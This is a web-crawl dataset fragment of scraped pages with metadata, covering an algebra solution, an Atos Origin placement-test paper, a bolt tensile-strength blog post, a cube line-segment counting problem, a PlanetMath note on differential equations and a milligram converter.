[ "# How do you rationalize the denominator and simplify (x - 42) / (sqrtx+7) - 7?\n\nJul 3, 2017\n\nSee a solution process below:\n\n#### Explanation:\n\nTo rationalize the denominator multiply the expression by $\\frac{7 - \\sqrt{x}}{7 - \\sqrt{x}}$\n\n$\\frac{7 - \\sqrt{x}}{7 - \\sqrt{x}} \\times \\frac{x - 42}{\\sqrt{x} + 7} - 7 \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{7 \\sqrt{x} + 49 - x - 7 \\sqrt{x}} - 7 \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{49 - x} - 7$\n\nTo subtract the $7$ we need to put it over a common denominator:\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{49 - x} - \\left(7 \\times \\frac{49 - x}{49 - x}\\right) \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x}}{49 - x} - \\frac{343 - 7 x}{49 - x} \\implies$\n\n$\\frac{7 x - 294 - x \\sqrt{x} + 42 \\sqrt{x} - 343 + 7 x}{49 - x} \\implies$\n\n$\\frac{7 x + 7 x - x \\sqrt{x} + 42 \\sqrt{x} - 294 - 343}{49 - x} \\implies$\n\n$\\frac{14 x + \\left(42 - x\\right) \\sqrt{x} - 637}{49 - x}$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5644346,"math_prob":1.0000082,"size":352,"snap":"2019-43-2019-47","text_gpt3_token_len":87,"char_repetition_ratio":0.109195404,"word_repetition_ratio":0.0,"special_character_ratio":0.24147727,"punctuation_ratio":0.08196721,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.000002,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-22T03:09:22Z\",\"WARC-Record-ID\":\"<urn:uuid:fc406332-252a-48f0-9db2-aa35740f193d>\",\"Content-Length\":\"34362\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f219193e-5646-417d-be92-f9de4fce044e>\",\"WARC-Concurrent-To\":\"<urn:uuid:6bfb021a-230e-4709-9ea6-68c27dc03e1f>\",\"WARC-IP-Address\":\"54.221.217.175\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-rationalize-the-denominator-and-simplify-x-42-sqrtx-7-7\",\"WARC-Payload-Digest\":\"sha1:SMVGQOJOIHJLSZ2G7DKVCQBSXTTMEQDW\",\"WARC-Block-Digest\":\"sha1:WA27RZT7U62QOAFQ2JRPWKXLUR7OXRP7\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496671106.83_warc_CC-MAIN-20191122014756-20191122042756-00406.warc.gz\"}"}
https://www.simplyfreshers.com/atos-origin-placement-paper-2012/
[ "Company: Atos Origin India Pvt Ltd\n\nWritten Test\n\nNo of questions100\n\nTime limit: 75 minutes (15 minutes for essay writing)\n\nNegative mark 0.5\n\nSectional cut off\n\na) Aptitude Test\n\n1 Train Problems\n2 Boat and streams.\n3Time and distance\n4 Time and work.\n5Percentage\n6 Ratio and proportion\n7Clock\n\nb)Logical Reasoning: 45 (logical puzzles)\n\nc)Verbal ability : 25\n\n2 passages 5 questions\n\nSentence correction etc.,\n\nd)Essay Writing : 15 minutes\n\nsome sample Questions\n\n1. Two successive discounts are 20% 40% then its equivalent discount\n2. If radius of cylinder is increased by 30% and height is decreased by 40% then what will % effect on volume of cylinder.\n3.The total expense of a boarding house are partly fixed and partly variable with the number of boarders. The charge is Rs.70 per head when there are 25 boarders and Rs.60 when there are 50 boarders. Find the charge per head when there are 100 boarders.\na) 65\nb) 55\nc) 50\nd) 45\nsoln.\na = fixed cost and\nk = variable cost and n = number of boarders\ntotal cost when 25 boarders c = 25*70 = 1750 i.e. 1750 = a + 25k\ntotal cost when 50 boarders c = 50*60 = 3000 i.e. 3000 = a + 50k\nsolving above 2 eqns, 3000-1750 = 25k i.e. 1250 = 25k i.e. k = 50\ntherefore, substituting this value of k in either of above 2 eqns we get\na = 500 (a = 3000-50*50 = 500 or a = 1750 – 25*50 = 500)\nso total cost when 100 boarders = c = a + 100k = 500 + 100*50 = 5500\nso cost per head = 5500/100 = 55\n\n4.Amal bought 5 pens, 7 pencils and 4 erasers. Rajan bought 6 pens, 8 erasers and 14 pencils for an amount which was half more than what Amal had paid. What % of the total amount paid by Amal was paid for pens?\na) 37.5%\nb) 62.5%\nc) 50%\nd) None of these\nsoln.\nLet, 5 pens + 7 pencils + 4 erasers = x rupees\nso 10 pens + 14 pencils + 8 erasers = 2*x rupees\nalso mentioned, 6 pens + 14 pencils + 8 erarsers = 1.5*x rupees\nso (10-6) = 4 pens = (2-1.5)x rupees\nso 4 pens = 0.5x rupees => 8 pens = x rupees\nso 5 pens = 5x/8 rupees = 5/8 of total (note x rupees is total amt paid by\namal) i.e 5/8 = 500/8% = 62.5% is the answer\n\n(5) 2 oranges, 3 bananas and 4 apples cost Rs.15. 3 oranges, 2 bananas, and 1 apple costs Rs 10. What is the cost of 3 oranges, 3 bananas and 3 apples?\na) 10 b) 20 c) 30.45 c) 15\nsoln. of 5.\n2x+3y+4z=15\n3x+2y+z=10\n5x+5y+5z=25\nx+y+z=5 that is for 1 orange ,1 bannana and 1 apple requires 5Rs.\nso for 3 orange ,3 bannana and 3 apple requires 15Rs.\ni.e. 3x+3y+3z=15\n\n(6) Age of Mohan’s sister is thrice of Mohan’s age then what will be sister’s age if Mohan’s age is 4 year at present. some questions are also from data interpretation. i can’t remember other questions but these question certainly give you some ideas. about question level\n\n(7) Amith and Binith invested Rs.30000 and Rs.40000 respectively in a business for one year If they earned Rs 7,700 at the end of the year then the find Bs proft?\n\nRs,3,800 b)Rs.3,300 c)Rs.4,000 d)Rs.4,400\n\n(8)There are 6 boxes numbered 1, 2,…6. Each box is to be filled up either with a red or a green ball in such a way that at least 1 box contains a green ball and the boxes containing green balls are consecutively numbered. The total number of ways in which this can be done is\n\nIf only one of the boxes has a green ball, it can be any of the 6 boxes. So, this can be achieved in 6 ways.\n\nIf two of the boxes have green balls and then there are 5 arrangement possible. 
i.e., the two green boxes can be one of 1-2 or 2-3 or 3-4 or 4-5 or 5-6.

If 3 of the boxes have green balls, there will be 4 options in which the 3 boxes are in consecutive positions, i.e., 1-2-3 or 2-3-4 or 3-4-5 or 4-5-6.

If 4 boxes have green balls, there will be 3 options, i.e., 1-2-3-4 or 2-3-4-5 or 3-4-5-6.

If 5 boxes have green balls, then there will be 2 options, i.e., 1-2-3-4-5 or 2-3-4-5-6.

If all 6 boxes have green balls, then there will be just 1 option.

Total number of options = 6 + 5 + 4 + 3 + 2 + 1 = 21.

(9) A runs 13/5 times as fast as B. If A gives a start of 240 m, how far must the post be so that A and B reach it at the same time?

A runs 13/5 times as fast as B, which means A runs 13 metres for every 5 metres of B.

Therefore, A gains 8 metres in a 13 m race; in other words, if A gives B a start of 8 m in a 13 m race, the race might end in a dead heat.

Therefore, if A gives a start of 240 m (8 × 30), the length of the race should be equal to 13 × 30 = 390 m.

Or: the length of the race, after A gives a start of 240 m, so that A and B reach the post at the same time, is given by (240 × 13)/8 = 390 m.

(A short script at the end of this paper cross-checks a few of these numerical answers.)

b) LOGICAL REASONING

(1) A, B and C are three cities in a straight line. What will be the distance between A and B?
(a) if the distance between A and C is 60 km
(b) the ratio of the distance between A and B to the distance between B and C is 2:5

(2) [Figure: vertex A above segment B-C with a point D between B and C; angles x and y are marked at A.]
Is line AD perpendicular to line BC?
(a) if x = y
(b) AB = DC
I can't remember the other questions; some were of the statement-conclusion type.

(2) There are doctors P, Q, R, S, T, U and V who practice in a hospital. Monday is the closed day. Each doctor can visit the hospital every day for 1 hour between 9 a.m. and 1 p.m.; 1 p.m. to 2 p.m. is lunch, and then 2 p.m. to 5 p.m.
Saturday is a half day, so each doctor does duty for half an hour.
R always does his duty after lunch.
P is always the first doctor to do duty every day.
Q is always the last doctor to do duty every day.
R is followed by W.
I can't remember it exactly, but this puzzle is an easy one; I solved it in the exam, though I faced some difficulties in the cricket puzzle problem.

(7) Six persons A, B, C, D, E and F are sitting in two rows, three in each. E is not at the end of any row.
D is second to the left of F.
C, the neighbour of E, is sitting diagonally opposite D.
B is the neighbour of F.

(1) Which of the following are sitting diagonally opposite to each other?
(a) F and C (b) D and A (c) A and C (d) A and F (e) A and B

(2) Who is facing B?
(a) A (b) C (c) D (d) E (e) F

(3) Which of the following are in the same row?
(a) A and E (b) E and D (c) C and B (d) A and B (e) C and E

(4) Which of the following are in the same row?
(a) FBC (b) CEB (c) DBF (d) AEF (e) ABF

(5) After interchanging seats with F, who will be the neighbour of D in the new position?
(a) C and A (b) E and B (c) only B (d) only A (e) only C
soln. (1) d (2) d (3) a (4) c (5) a

8) Mohan is taller than Ram. Mohan is taller than Sohan. Then what can be said?
(a) Ram is taller than Sohan
(b) Sohan is taller than Ram
(c) can't tell
soln. c

9) There are five empty chairs in a row. If six men and four women are waiting to be seated, what is the probability that the seats will be occupied by two men and three women?

10) If the time shown by a clock is 2:27, then what time does its mirror image show?

a) 10:33 b) 9:33 c) 9:37 d) 10:23

11) This data sufficiency problem consists of a question and two statements, labeled (1) and (2), in which certain data are given. 
You have to decide whether the data given in the statements are sufficient for answering the question. Using the data given in the statements, plus your knowledge of mathematics and everyday facts (such as the number of days in a leap year or the meaning of the word counterclockwise), you must indicate whether –

Statement (1) ALONE is sufficient, but statement (2) alone is not sufficient to answer the question asked.

Statement (2) ALONE is sufficient, but statement (1) alone is not sufficient to answer the question asked.

BOTH statements (1) and (2) TOGETHER are sufficient to answer the question asked, but NEITHER statement ALONE is sufficient to answer the question asked.

EACH statement ALONE is sufficient to answer the question asked.

Statements (1) and (2) TOGETHER are NOT sufficient to answer the question asked, and additional data specific to the problem are needed.

Numbers
All numbers used are real numbers.

Figures
A figure accompanying a data sufficiency question will conform to the information given in the question but will not necessarily conform to the additional information given in statements (1) and (2).

Lines shown as straight can be assumed to be straight and lines that appear jagged can also be assumed to be straight.

You may assume that the positions of points, angles, regions, etc. exist in the order shown and that angle measures are greater than zero.

All figures lie in a plane unless otherwise indicated.

Note
In data sufficiency problems that ask for the value of a quantity, the data given in the statements are sufficient only when it is possible to determine exactly one numerical value for the quantity.

Question 1

What is the value of X, if X and Y are two distinct integers and their product is 30?
1. X is an odd integer
2. X > Y

The correct choice is (E): the value of X cannot be determined from the information provided.

From the question, we know that both X and Y are distinct integers and their product is 30.

30 can be obtained as a product of two distinct integers in the following ways:

1 * 30

(-1) * (-30)

2 * 15

(-2) * (-15)

3 * 10

(-3) * (-10)

5 * 6

(-5) * (-6)

Statement 1: From this statement, we know that the value of X is odd. Therefore, X can be one of the following values: 1, -1, 3, -3, 5, -5, 15, -15. So, using the information in statement 1 we will not be able to conclusively decide the value of X. Hence, statement 1 alone is not sufficient to answer the question. Hence, answer choices (A) and (D) can be eliminated.

Statement 2: From this statement, we know that the value of X > Y. From the given combinations, X can take more than one value. Hence, using the information in statement 2, we will not be able to find the value of X. Therefore, we can eliminate answer choice (B).

Combining the two statements, we know that X is odd and that the value of X > Y.
Values of X and Y that satisfy both conditions include X taking the value of -1, -3, -5 or 15 (the last paired with Y = 2).

As the information provided in the two statements, independently or together, is not sufficient to answer the question, the correct answer is Choice (E).

Verbal Ability

Directions—(Q. 
1–15) Read the following passage carefully and answer the questions given below it. Certain words have been printed in bold to help you locate them while answering some of the questions.

Goldman Sachs predicted that the crude oil price would hit \$200, and just as it appeared that alternative renewable energy had a chance of becoming an economically viable option, the international price of oil fell by over 70%. After hitting the all-time high of \$147 a barrel a month ago, crude oil fell to less than \$40 a barrel. What explains this sharp decline in the international price of oil? There has not been any major new discovery of a hitherto unknown source of oil or gas. The short answer is that the demand does not have to fall by a very sizeable quantity for the price of crude to respond as it did. In the short run, the price elasticity of demand for crude oil is very low. Conversely, in the short run, even a relatively big change in the price of oil does not immediately lower consumption. It takes months, or years, of high oil prices to inculcate habits of energy conservation. The world crude oil price had remained at over \$60 a barrel for most of 2005-2007 without making any major dent in demand.

The long answer is more complex. The economic slowdown in the US, Europe and Asia, along with dollar depreciation and commodity speculation, have all had some role in the downward descent in the international price of oil. In recent years, the supply of oil has been rising but not enough to catch up with the rising demand, resulting in an almost vertical escalation in its price. The number of crude oil futures and options contracts has also increased manifold, which has led to significant speculation in the oil market. In comparison, the role of the Organization of Petroleum Exporting Countries (OPEC) in fixing the crude price has considerably weakened. OPEC is often accused of operating as a cartel restricting output, thus keeping prices artificially high. It did succeed in setting the price of crude during the 1970s and the first half of the 80s. But, with increased futures trading and contracts, the control of crude pricing has moved from OPEC to banks and markets that deal with futures trading and contracts. It is true that most oil exporting regions of the world have remained politically unstable, fuelling speculation over the price of crude. But there is little evidence that the geopolitical uncertainties in west Asia have improved to weaken the price of oil. Threatened by the downward slide of the oil price, OPEC has, in fact, announced its decision to curtail output.

However, most oil importers will heave a sigh of relief as they find their oil import bills decline, except for those who bought options to import oil at prices higher than market prices. Exporting nations, on the other hand, will see their economic prosperity slip. The relatively low price of crude is also bad news for investments in alternative renewable energy that cannot compete with cheaper and non-renewable sources of energy.

1. Why are oil importing countries relieved ?

(A) Price of crude reached \$147, not \$200 as was predicted

(B) Discovery of oil reserves within their own territories

(C) Demand for crude has fallen sharply

(D) There is no need for them to invest huge amounts of money in alternative sources of energy

(E) None of these

Ans : (E)

2. Which of the following factors is responsible for rise in speculation in crude oil markets ?

1. 
OPEC has not been able to restrict the oil output and control prices\n\n2. The supply of oil has been rising to match demand\n\n3. Existence of large number of oil futures and oil contracts\n\n(A) Only 1\n\n(B) Both 1 & 2\n\n(C) Only 3\n\n(D) All 1, 2 & 3\n\n(E) None of these\n\nAns : (C)\n\n3. What does the phrase “the price elasticity of demand for crude oil is very low” imply ?\n\n(A) When the price rises the demand for crude oil falls immediately\n\n(B) A small change in demand will result in a sharp change in the price of crude\n\n(C) Within a short span of time the price of crude oil has fluctuated sharply\n\n(D) Speculation in oil does not have much of an impact on its price\n\n(E) None of these\n\nAns : (E)\n\n4. Which of the following is/are TRUE in the context of the passage ?\n\n1. The decline in oil prices has benefited all countries\n\n2. Renewable energy sources are costlier than non-renewable ones\n\n3. Lack of availability of alternative renewable energy resulted in rise in demand for crude\n\n(A) Only 2\n\n(B) Both 1 & 2\n\n(C) Both 2 & 3\n\n(D) Only 3\n\n(E) None of these\n\nAns : (D)\n\n5. What has been the impact of the drop in oil prices ?\n\n(A) Exploration for natural gas resources has risen\n\n(B) The dollar has fallen sharply\n\n(C) OPEC has decided to restrict its production of oil\n\n(D) Economic depression in oil importing countries\n\n(E) Drastic fall in demand for crude oil\n\nAns : (C)\n\nRead each sentence to find out whether there is any grammatical error or\n\nidiomatic error in it. The error, if any, will be in one part of the sentence. The letter of that part is the answer. If there is no error, the answer is (E) (Ignore errors of punctuation, if any.)\n\n31. He has taken care to (A) / compliance with the norms (B) / so he expects the proposal (C) / to beapproved without delay. (D) No error (E)\n\nAns : (B)\n\n32. Under the terms of the new deal (A) / the channel can broadcast (B) / the next cricket tournament tobe (C) / played among India and Australia. (D) No error (E)\n\nAns : (D)\n\n33. Our equipment gets damage (A) / very often in summer (B) / because there are (C) / frequent powercuts. (D) No error (E)Ans : (A)\n\nTechnical and HR Questions\n\nHow to know if there are expensive sql statements running?\n\nWhat will you do then to improve the response time?\n\nHow to check if your r/3 system is 32bit or 64bit?\n\nHow to check if your R3 system is unicode or non-unicode?\n\nHow many types of organization data?\n\nWhat is data consistency?\n\nWhat is the difference between normal report program and module pool program?\n\nHow many windows can be maintained under one page?\n\nImagine that ten years from now a colleague is describing you to a new employee. What will s/he say\n\nWhat are the document needed to create a test case?How u tell it is test case?\n\nWhat is Thread ?(VC++)What is the difference between Cmutex and Csemaphone?\n\nWhat?s the difference between Response.Write() andResponse.Output.Write()?\n\nWhat is Initialization Purpose?\n\nEvents in Reports?\n\nWhat the Recording Purpose?\n\nQuestions from resume specially from educational background,\nWhich was the subject u hate most – I said Maths, I explained the reason, Then He agreed with me\nWhich subject u love – I said Java,\n\nC++,HTML,XML\n\nOops concepts\n\nInheritance\n\nDiff between Oracle9i, Oracle10g, and Oracle11i ?? 
Give me Examples\n\nCan u write a program with dynamically allocation of variable?\n\nCan u rite a Javasacript programe ??\n\nWhat are control statements in c ?\n\nFamily Background\n\nSome Gk questions related to ministers" ]
https://tyfastener.com/uncategorized/the-method-of-calculating-tensile-strength-of-hexagon-socket-head-bolts/
[ "# Blog\n\nBack to Blog\n\n## The Method of Calculating Tensile Strength of Hexagon Socket Head Bolts\n\nStrength is the bearing capacity per unit area, is an indicator.\nFormula: Bearing capacity = strength x area;\nThreaded bolt, M24 bolt cross-sectional area is not the diameter of the circular area of 24, but 353 mm2, called the effective area.\n\nNormal Bolt Grade C (grades 4.6 and 4.8) The tensile strength is 170 N / mm 2.\nThen the carrying capacity is: 170×353 = 60010N. Conversion, 1 ton equivalent to 1000KG, equivalent to 10000N, then M24 bolts that can withstand about 6 tons of tension.", null, "Back to Blog" ]
[ null, "http://tyfastener.com/wp-content/uploads/2017/12/TIM截图20171226144614-300x152.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8177137,"math_prob":0.97504157,"size":577,"snap":"2019-43-2019-47","text_gpt3_token_len":153,"char_repetition_ratio":0.118673645,"word_repetition_ratio":0.0,"special_character_ratio":0.28249568,"punctuation_ratio":0.1440678,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97032344,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-14T11:46:57Z\",\"WARC-Record-ID\":\"<urn:uuid:e6ec6861-ae8f-448a-8154-f1bcc458af2f>\",\"Content-Length\":\"43948\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5bfc454a-914a-43b4-a5c5-d6c115e2dfdf>\",\"WARC-Concurrent-To\":\"<urn:uuid:1e14a013-6cea-4e1e-80c4-4d09b119a8c8>\",\"WARC-IP-Address\":\"192.81.135.27\",\"WARC-Target-URI\":\"https://tyfastener.com/uncategorized/the-method-of-calculating-tensile-strength-of-hexagon-socket-head-bolts/\",\"WARC-Payload-Digest\":\"sha1:QH7O6OVLJGRNDV7WKIO3OF3LV5HXHNT7\",\"WARC-Block-Digest\":\"sha1:MUDIMPIKFXU7GH5OJ2QGXFKBOTFC3CU5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668416.11_warc_CC-MAIN-20191114104329-20191114132329-00302.warc.gz\"}"}
https://artofproblemsolving.com/wiki/index.php/1996_AHSME_Problems/Problem_10
[ "# 1996 AHSME Problems/Problem 10\n\n## Problem\n\nHow many line segments have both their endpoints located at the vertices of a given cube?", null, "$\\text{(A)}\\ 12\\qquad\\text{(B)}\\ 15\\qquad\\text{(C)}\\ 24\\qquad\\text{(D)}\\ 28\\qquad\\text{(E)}\\ 56$\n\n## Contents\n\n### Solution 1\n\nThere are", null, "$8$ choices for the first endpoint of the line segment, and", null, "$7$ choices for the second endpoint, giving a total of", null, "$8\\cdot 7 = 56$ segments. However, both", null, "$\\overline{AB}$ and", null, "$\\overline{BA}$ were counted, while they really are the same line segment. Every segment got double counted in a similar manner, so there are really", null, "$\\frac{56}{2} = 28$ line segments, and the answer is", null, "$\\boxed{D}$.\n\nIn shorthand notation, we're choosing", null, "$2$ endpoints from a set of", null, "$8$ endpoints, and the answer is", null, "$\\binom{8}{2} = \\frac{8!}{6!2!} = 28$.\n\n### Solution 2\n\nEach segment is either an edge, a facial diagonal, or a long/main/spacial diagonal.\n\nA cube has", null, "$12$ edges: Four on the top face, four on the bottom face, and four that connect the top face to the bottom face.\n\nA cube has", null, "$6$ square faces, each of which has", null, "$2$ facial diagonals, for a total of", null, "$6\\cdot 2 = 12$.\n\nA cube has", null, "$4$ spacial diagonals: each diagonal goes from one of the bottom vertices to the \"opposite\" top vertex.\n\nThus, there are", null, "$12 + 12 + 4 = 28$ segments, and the answer is", null, "$\\boxed{D}$.\n\nThe problems on this page are copyrighted by the Mathematical Association of America's American Mathematics Competitions.", null, "" ]
[ null, "https://latex.artofproblemsolving.com/3/b/9/3b94b6727c87da629bddb3ea6c9c750d8b7e2ff1.png ", null, "https://latex.artofproblemsolving.com/8/4/5/8455f3b5cb3b4880b8c9d782a5c1f0334db819eb.png ", null, "https://latex.artofproblemsolving.com/e/0/a/e0a0db32027a732ac57d37ef2ae9bb150f65b108.png ", null, "https://latex.artofproblemsolving.com/9/2/f/92f53df4fe169afe4ae861f0ff251c939e69fcf3.png ", null, "https://latex.artofproblemsolving.com/8/4/0/840e2b592390eb6ec918fa6f3292716ce170de66.png ", null, "https://latex.artofproblemsolving.com/6/b/b/6bba4a6433bf5e62d09d40bfbb8a5db10ef9d19a.png ", null, "https://latex.artofproblemsolving.com/2/b/b/2bb595941368967d3b1431f01982da4214fb026f.png ", null, "https://latex.artofproblemsolving.com/5/5/b/55bdade53f471aab49f63d1a734979cc0c636640.png ", null, "https://latex.artofproblemsolving.com/4/1/c/41c544263a265ff15498ee45f7392c5f86c6d151.png ", null, "https://latex.artofproblemsolving.com/8/4/5/8455f3b5cb3b4880b8c9d782a5c1f0334db819eb.png ", null, "https://latex.artofproblemsolving.com/d/e/3/de3a7670fdf00dd1ff35cea651c1adde05a678f1.png ", null, "https://latex.artofproblemsolving.com/e/d/f/edf074831eb5bc9e61d6d6e09f525a86e3068f6a.png ", null, "https://latex.artofproblemsolving.com/6/0/1/601a7806cbfad68196c43a4665871f8c3186802e.png ", null, "https://latex.artofproblemsolving.com/4/1/c/41c544263a265ff15498ee45f7392c5f86c6d151.png ", null, "https://latex.artofproblemsolving.com/6/2/7/62774e4f2a907dffd5c535d74af2b156e53483c7.png ", null, "https://latex.artofproblemsolving.com/c/7/c/c7cab1a05e1e0c1d51a6a219d96577a16b7abf9d.png ", null, "https://latex.artofproblemsolving.com/f/9/e/f9e04072c67f1bdac2d206313e4c17dbcc672949.png ", null, "https://latex.artofproblemsolving.com/5/5/b/55bdade53f471aab49f63d1a734979cc0c636640.png ", null, "https://wiki-images.artofproblemsolving.com//8/8b/AMC_logo.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89972013,"math_prob":0.99908507,"size":1404,"snap":"2020-45-2020-50","text_gpt3_token_len":377,"char_repetition_ratio":0.12785715,"word_repetition_ratio":0.01831502,"special_character_ratio":0.2962963,"punctuation_ratio":0.106617644,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9993625,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"im_url_duplicate_count":[null,7,null,null,null,null,null,4,null,null,null,null,null,4,null,null,null,null,null,null,null,4,null,null,null,null,null,null,null,4,null,null,null,4,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-11-27T09:13:02Z\",\"WARC-Record-ID\":\"<urn:uuid:06491f79-eeb7-4e4e-b204-119adbd8af9e>\",\"Content-Length\":\"43551\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bf28f019-58b9-47b9-bf78-801a4fddd2c4>\",\"WARC-Concurrent-To\":\"<urn:uuid:34ca6259-9347-4582-b04e-65e34f83832d>\",\"WARC-IP-Address\":\"104.26.10.229\",\"WARC-Target-URI\":\"https://artofproblemsolving.com/wiki/index.php/1996_AHSME_Problems/Problem_10\",\"WARC-Payload-Digest\":\"sha1:NTK5J5GJ434HE4ANCNNQH2USC4BCLNIZ\",\"WARC-Block-Digest\":\"sha1:VOCX3OIH6AKLDZE4AMFHJBKAHUZ72PTC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141191511.46_warc_CC-MAIN-20201127073750-20201127103750-00706.warc.gz\"}"}
https://planetmath.org/PersistenceOfDifferentialEquations
[ "# persistence of differential equations\n\nThe persistence of analytic relations has important consequences for the theory of differential equations", null, "", null, "in the complex plane", null, "", null, ". Suppose that a function", null, "", null, "$f$ satisfies a differential equation $F(x,f(x),f^{\\prime}(x),\\ldots,f^{(n)})=0$ where $F$ is a polynomial", null, "", null, ". This equation may be viewed as a polynomial relation between the $n+2$ functions $\\mathrm{id},f,f^{\\prime},\\ldots,f^{(n)}$ hence, by the persistence of analytic relations, it will also hold for the analytic continuations of these functions. In other words, if an algebraic differential equation holds for a function in some region, it will still hold when that function is analytically continued to a larger region.\n\nAn interesting special case is that of the homogeneous linear differential equation with polynomial coefficients. In that case, we have the principle of superposition which guarantees that a linear combination", null, "", null, "of solutions is also a solution. Hence, if we start with a basis of solutions to our equation about some point and analytically continue them back to our starting point, we obtain linear combinations of those solutions. This observation plays a very important role in the theory of differential equations in the complex plane and is the foundation for the notion of monodromy group and Riemann’s global characterization of the hypergeometric function", null, "", null, "", null, "", null, "", null, ".\n\nFor a less exalted illustrative example, we can consider the complex logarithm. The differential equation\n\n $xy^{\\prime\\prime}+y^{\\prime}=0$\n\nhas as solutions $y=1$ and $y=\\log x$. While the former is as singly valued as functions get, the latter is multiply valued. Hence upon performong analytic continuation, we expect that the second solution will continue to a linear combination of the two solutions. This, of course is exactly what happens; upon analytic continuation, the second solution becomes the solution $y=\\log x+n\\pi i$ where $n$ is an integer whose value depends on how we carry out the analytic continuation.\n\nTitle persistence of differential equations PersistenceOfDifferentialEquations 2013-03-22 16:20:35 2013-03-22 16:20:35 rspuzio (6075) rspuzio (6075) 10 rspuzio (6075) Corollary msc 30A99" ]
[ null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null, "http://dlmf.nist.gov/style/DLMF-16.png", null, "http://dlmf.nist.gov/style/DLMF-16.png", null, "http://dlmf.nist.gov/style/DLMF-16.png", null, "http://mathworld.wolfram.com/favicon_mathworld.png", null, "http://planetmath.org/sites/default/files/fab-favicon.ico", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91289604,"math_prob":0.9991691,"size":2153,"snap":"2020-10-2020-16","text_gpt3_token_len":435,"char_repetition_ratio":0.16845044,"word_repetition_ratio":0.025316456,"special_character_ratio":0.19786344,"punctuation_ratio":0.083798885,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99933565,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-29T19:10:25Z\",\"WARC-Record-ID\":\"<urn:uuid:55e91aa8-ecc3-41be-ae83-a4ff7b39de0b>\",\"Content-Length\":\"12857\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ca91f2fe-5f2f-4445-8108-186bef1a47b9>\",\"WARC-Concurrent-To\":\"<urn:uuid:4fc363c2-96ce-4abd-823c-b30810a33f08>\",\"WARC-IP-Address\":\"129.97.206.129\",\"WARC-Target-URI\":\"https://planetmath.org/PersistenceOfDifferentialEquations\",\"WARC-Payload-Digest\":\"sha1:Q72BHGI7UGFQTI54252XH6OY5FZ5SVRQ\",\"WARC-Block-Digest\":\"sha1:2JNPBVFI3BAUD5VNGET46FKYLYEL5NIS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370495413.19_warc_CC-MAIN-20200329171027-20200329201027-00223.warc.gz\"}"}
https://www.quizzes.cc/calculator/weight/milligrams/230
[ "### How much is 230 milligrams?\n\nConvert 230 milligrams. How much does 230 milligrams weigh? What is 230 milligrams in other units? How big is 230 milligrams? Convert 230 milligrams to lbs, kg, mg, oz, grams, and stone. To calculate, enter your desired inputs, then click calculate. Some units are rounded.\n\n### Summary\n\nConvert 230 milligrams to lbs, kg, mg, oz, grams, and stone.\n\n#### 230 milligrams to Other Units\n\n 230 milligrams equals 0.23 grams 230 milligrams equals 0.00023 kg 230 milligrams equals 230 mg\n 230 milligrams equals 0.008113017866 oz 230 milligrams equals 0.0005070636166 lbs 230 milligrams equals 3.621881835E-5 stone" ]
https://ez.analog.com/studentzone/f/discussions/76437/may-studentzone-quiz-solution
